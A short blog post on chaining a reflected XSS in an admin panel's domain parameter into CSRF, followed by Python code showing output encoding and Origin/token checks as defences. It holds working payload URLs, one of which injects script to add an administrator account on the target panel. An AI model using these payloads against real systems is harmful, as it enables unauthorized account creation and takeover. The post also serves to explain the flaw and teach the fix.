Using XSS to exploit a CSRF vulnerability

Category: 颓废's Blog
For example, an XSS vulnerability in the domain parameter:

https://www.0dayhack.com/admin_loglist.html?domain=<script>alert(xss)</script>

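Combined with the cross-site request forgery vulnerability (目标地址 stands for the target address and 数据 for the request data):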

https://www.0dayhack.com/admin_loglist.html?domain=<script>ajaxRequest('目标地址','数据', "post")</script>

For example, a request to admin_adduser:

https://www.0dayhack.com/admin_loglist.html?domain=<script>ajaxRequest('admin_adduser','domain=netfairy.net&user={"username":"tadcdacest","password":"addscdamin","oldpassword":"","max_download":"0","max_upload":"0","max_download_account":"0","max_upload_account":"0","max_connection":"0","connect_timeout":"5","idle_timeout":"5","connect_per_ip":"0","pass_length":"0","show_hidden_file":0,"change_pass":0,"send_message":0,"ratio_credit":"0","ratio_download":"1","ratio_upload":"1","ratio_count_method":0,"enable_ratio":0,"current_quota":"0","max_quota":"0","enable_quota":0,"note_name":"","note_address":"","note_zip":"","note_phone":"","note_fax":"","note_email":"","note_memo":"","ipmasks":[],"filemasks":[],"directories":[],"usergroups":[],"subdir_perm":[],"enable_schedule":0,"schedules":[],"limit_reset_type":"0","limit_enable_upload":0,"cur_upload_size":"0","max_upload_size":"0","limit_enable_download":0,"cur_download_size":"0","max_download_size":"0","enable_expire":0,"expiretime":"2017-04-12 10:42:40","protocol_type":63,"enable_password":1,"enable_account":1,"ssh_pubkey_path":"","enable_ssh_pubkey_auth":0,"ssh_auth_method":0}', "post")</script>
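The server-side checks that break this chain, as an added example that is not code from the original post or from the affected product: the reflected domain parameter is HTML-encoded, and the state-changing handler requires a trusted Origin and a per-session token. The function names, TRUSTED_ORIGIN and the in-memory session store are assumptions made for the illustration.

```python
import hmac
import html
import secrets

TRUSTED_ORIGIN = "https://admin.example.test"  # assumed origin of the admin panel
SESSIONS = {}  # session id -> anti-CSRF token (in-memory store for the example)


def login(session_id):
    """Issue a random per-session anti-CSRF token when the admin logs in."""
    SESSIONS[session_id] = secrets.token_urlsafe(32)
    return SESSIONS[session_id]


def render_loglist(domain):
    """Reflect the domain query parameter only after HTML-encoding it."""
    return "<h1>Logs for {}</h1>".format(html.escape(domain, quote=True))


def handle_adduser(session_id, origin, csrf_token, body):
    """State-changing endpoint: verify session, Origin and token before acting."""
    expected = SESSIONS.get(session_id)
    if expected is None:
        return 401, "not logged in"
    if origin != TRUSTED_ORIGIN:
        return 403, "cross-origin request rejected"
    # Compare as bytes so a non-ASCII token cannot raise inside compare_digest.
    if not csrf_token or not hmac.compare_digest(
        csrf_token.encode("utf-8"), expected.encode("utf-8")
    ):
        return 403, "missing or invalid CSRF token"
    return 200, "user created"  # a real handler would parse and validate body here


if __name__ == "__main__":
    reflected = "<script>alert(xss)</script>"  # value taken from the URL on this page
    print(render_loglist(reflected))
    token = login("sess-1")  # constructed session id
    print(handle_adduser("sess-1", "https://other.example.test", None, "domain=x"))
    print(handle_adduser("sess-1", TRUSTED_ORIGIN, token, "domain=x"))
```

The Origin and token checks reject requests forged from another site, but script injected through admin_loglist.html runs in the panel's own origin and can read the token. Encoding the reflected parameter is therefore the fix that stops the combination described above.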
